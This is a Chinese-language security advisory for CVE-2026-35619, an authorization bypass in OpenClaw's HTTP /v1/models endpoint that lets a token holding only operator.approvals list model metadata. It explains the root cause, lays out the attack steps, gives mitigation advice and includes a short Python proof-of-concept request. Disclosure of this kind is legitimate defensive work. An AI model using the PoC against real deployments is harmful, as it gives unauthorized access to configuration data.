CVE-2026-35619 CVSS 4.3 中危

CVE-2026-35619 OpenClaw权限绕过漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35619

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.24之前的版本中存在授权绕过漏洞，位于HTTP /v1/models端点。由于该端点未能强制执行操作员读取范围要求，导致仅拥有operator.approvals权限的攻击者，能够通过HTTP兼容路由枚举网关模型元数据。此攻击行为成功绕过了WebSocket RPC中更严格的授权检查，从而造成了敏感信息泄露风险。

技术细节

该漏洞的根本原因在于OpenClaw系统对于不同协议接口的权限验证逻辑存在不一致性。虽然WebSocket RPC接口正确实施了严格的安全策略，要求读取模型元数据必须具备特定的操作员读取权限，但HTTP /v1/models端点作为兼容接口，却未同步这一校验机制。在具体实现中，当请求到达/v1/models端点时，系统仅验证了请求者是否拥有基本的操作员身份，而未深入检查其令牌中是否包含读取模型所需的具体作用域。因此，攻击者可以利用持有`operator.approvals`（仅审批权限）的低权限令牌，直接构造HTTP GET请求访问该端点。由于校验逻辑的缺失，服务器会错误地返回网关中所有模型的元数据信息。这种越权访问使得攻击者能够获取系统内部的敏感配置信息，为后续攻击提供数据支持。

攻击链分析

STEP 1

1. 身份获取

攻击者获取一个有效的 OpenClaw 访问令牌，该令牌仅包含 operator.approvals 权限，而非读取权限。

STEP 2

2. 探测端点

攻击者向目标服务器发送 HTTP GET 请求至 /v1/models 端点，并在 Header 中携带上述低权限令牌。

STEP 3

3. 绕过验证

服务器端 /v1/models 接口仅验证了操作员身份，未严格检查读取范围，导致验证通过。

STEP 4

4. 信息泄露

服务器返回网关中所有模型的元数据，攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_openclaw(target_url, token):
    """
    PoC for CVE-2026-35619
    Bypass authorization check to enumerate models.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    # The vulnerable endpoint
    endpoint = f"{target_url.rstrip('/')}/v1/models"
    
    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Success! Authorization bypassed.")
            print("[+] Model Metadata:")
            print(response.text)
        else:
            print(f"[-] Failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target and a token with only 'operator.approvals' scope
    target = "http://localhost:8080"
    poc_token = "poc_token_with_limited_scope"
    exploit_openclaw(target, poc_token)

影响范围

OpenClaw < 2026.3.24

防御指南

临时缓解措施

建议立即升级至 2026.3.24 或更高版本以修复此漏洞。如果暂时无法升级，应在应用网关或防火墙层面对 /v1/models 接口实施严格的访问控制策略，仅允许受信任的 IP 地址或服务调用，并加强对异常访问行为的日志审计。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表